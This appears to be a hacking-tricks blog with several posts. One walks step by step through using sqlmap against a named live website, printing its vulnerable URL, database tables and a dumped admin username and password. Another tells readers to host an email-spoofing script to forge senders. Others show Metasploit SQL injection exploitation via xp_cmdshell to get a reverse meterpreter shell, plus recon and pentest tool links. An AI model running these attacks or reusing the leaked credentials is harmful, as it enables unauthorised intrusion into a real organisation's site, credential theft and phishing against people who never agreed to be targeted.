Wednesday, 4 February 2015

Visit my new website

hello every one....sorry.....
because i am going to stop all updates on this blog but I launch my new website relates to hacking tricks  with new name,new team and new tricks

please.........
Visit my new website

http://secret-hacker.com

http://secret-hacker.com 

http://secret-hacker.com 

contact me here
----------------------------------------------------------
mr.akshayborase@gmail.com
----------------------------------------------------------

Thursday, 20 February 2014

SQL injection with SQLMAP Tool

SQLMAP-->

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


first search the vulnerability into the target website.

target-->www.tsbuttons.com.bd 

now find the sql injection vulnerability into target website
ohh I found it....
vulnerability-->tsbuttons.com.bd/jean_tack_buttons.php?ptid=20'


this is the error on website
---------------------------------------------
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
---------------------------------------------

now start the Game ( hack the target site )

1.open the sqlmap

root@kali:~# sqlmap --help





2.find out the database name of the target website

root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 --dbs



output is
----------------------------------------
available databases [2]:
[*] information_schema
[*] tsbutton_db
---------------------------------------


3.access the tables of database

root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db --tables



output is
--------------------------------------------------------------------------------------------------------
[23:29:38] [INFO] fetching tables for database: 'tsbutton_db'
Database: tsbutton_db
[4 tables]
+------------------------+
| news                 |         
| product            |
| product_type   |
| users               |
+------------------------+
---------------------------------------------------------------------------------------------------------

4.now it time to access the columns of tables which are we fetch from databse

root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db -T users --columns




output is
--------------------------------------------------------
Database: tsbutton_db
Table: users
[5 columns]
+--------------------+----------------------+
| Column        | Type               |
+-------------------+-----------------------+
| name           | varchar(25)    |
| Password   | varchar(255)  |
| type             | int(4)               |
| userid         | int(25)             |
| username | varchar(25)     |
+------------------+-----------------------+
-------------------------------------------------------


5.access the user name


root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db -T users -C username --dump



yehh
we get the user name of the target website
username-->admin


6.Lets access the password

root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db -T users -C password --dump




 finally Game is over

--------------------------------------------------------------
username-->admin
password-->water
-------------------------------------------------------------






Tuesday, 11 June 2013

Email spoofing

Email spoofing is the creation of email messages with a forged sender address - something which is simple to do because the core SMTP protocols do no authentication. Spam and phishing emails typically use such spoofing to mislead the recipient about the origin of the message.
A number of measures to address spoofing are available including: SPF, Sender ID, DKIM, and DMARC. Although their use is increasing, it is likely that almost half of all domains still do not have such measures in place


first of all download EmailSpoofer.php file

    Upload the files to any of the free Web hosting server. Some Free Web hosting servers are given below you can also find few more for yourself. 
  • http://www.serversfree.com/
  • http://www.yourfreehosting.net/ 
  • http://www.esmartstart.com/ 
  • http://www.110mb.com/ 
  • http://www.drivehq.com/ 
  • http://www.t35.com/
  • http://www.my3gb.com/
and click on the EmailSpoofer.php file then you get fake mail sender application



fake mail from bill gates



warning
------------------------------------------------------------------------------------------------------------------------
You may use this script for educational purposes only.
I cannot be held responsible for any legal action or other action taken against you because of use of this script.
Use at your own risk.

no one is untraceable
------------------------------------------------------------------------------------------------------------------------


Sunday, 5 May 2013

Recon-ng : Web Reconnaisance framework for Penetration testers

Recon-ng is a full-featured Web Reconnaissance framework written in Python. Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. 

 

Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.

If you want to exploit, use the Metasploit Framework. If you want to Social Engineer, us the Social Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng!

How to use ? Complete Guide is available here

Recon-ng repository
git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git

Saturday, 4 May 2013

New penetration testing framework (pentbox-1.5)


--------- Menu--------------

1- Cryptography tools
2- Network tools
3- Web
4- License and contact
5- Exit
------------------------------

Download Pentbox-1.5

Monday, 18 February 2013

Exploiting SQL injection vulnerabilities with Metasploit (Part-2)

                Recently we were performing an web application penetration test to one of our clients and identified a SQL injection vulnerability. The vulnerability allowed us to conduct a degree of fingerprinting on the remote server; however, the Microsoft SQL Server back-end database didn’t allow to execute commands via the well known xp_cmdshell stored procedure.

                Based on the fingerprinting information we identified that the database server was running an old and vulnerable version of MS SQL server. Microsoft SQL Sever 2000 SP3, to be precise.
All indicated that the server was vulnerable to MS09-004 vulnerability. However, it was not possible to get direct access to the database. Moreover no authentication credentials were discovered during the course of the assessment.

                This is how our newly released Metasploit module was born. We coded an extension which can be added to Metasploit to exploit this vulnerability using a SQL injection vulnerability with no need of using credentials, as the web application will authenticate in our behalf.

 Penetration testing - SQL injection exploitation


The screenshot above shows how to get meterpreter (or any other payload of your choice) exploiting the vulnerability from Metasploit.

Tuesday, 29 January 2013

Exploiting SQL injection vulnerabilities with Metasploit (Part-1)

In this post we are going to show how to exploit a SQL injection vulnerability on a web application using Microsoft SQL server backend where xp_cmdshell is available to the attacker. Given a penetration test to a web application it is identified that it is vulnerable to SQL injection attacks and the penetration tester can execute administrative stored procedures:
http://192.168.1.66/showproduct.asp?id=1;exec master..xp_cmdshell ‘ping 192.168.1.64′;–
If the request shown above is successful then arbitrary commands could be executed in the host. At this point, there are a number of options that would allow the tester to fully compromise the server. There are public tools which could aid the attacker to automate the take over process. This post will cover the use of a Metasploit module.

The mssql_payload_sqli module will execute any Windows payload on the target host. In this example we will execute meterpreter which is one of the payloads that offers great flexibility to the penetration tester.

It is necessary to specify the exact point where the SQL injection vulnerability is. We do that by entering the GET_PATH variable with an [SQLi] token. The token will be the place where the payload will be executed. The rest of the exploitation process is the same as any other vulnerability, this is the exploitation based on the URL shown above:

msf > use windows/mssql/mssql_payload_sqli

msf exploit(mssql_payload_sqli) >set GET_PATH http://192.168.1.66/
showproduct.asp?id=1;[SQLi];--
GET_PATH => http://192.168.1.66/showproduct.asp?id=1;[SQLi];--
 
msf exploit(mssql_payload_sqli) > set RHOST 192.168.1.66
RHOST => 192.168.1.66

msf exploit(mssql_payload_sqli) >set PAYLOAD windows/patchupmeterpreter/reverse_tcp
PAYLOAD => windows/patchupmeterpreter/reverse_tcp

msf exploit(mssql_payload_sqli) > set LHOST 192.168.1.64
LHOST => 192.168.1.64

msf exploit(mssql_payload_sqli) > set LPORT 80
LPORT => 80

msf exploit(mssql_payload_sqli) > exploit
 
  
 After the exploitation the attacker will get a meterpreter shell. 
 
 
SQL injection exploitation with Metasploit
If you want to use this code you can download it from Secforce security tools repository.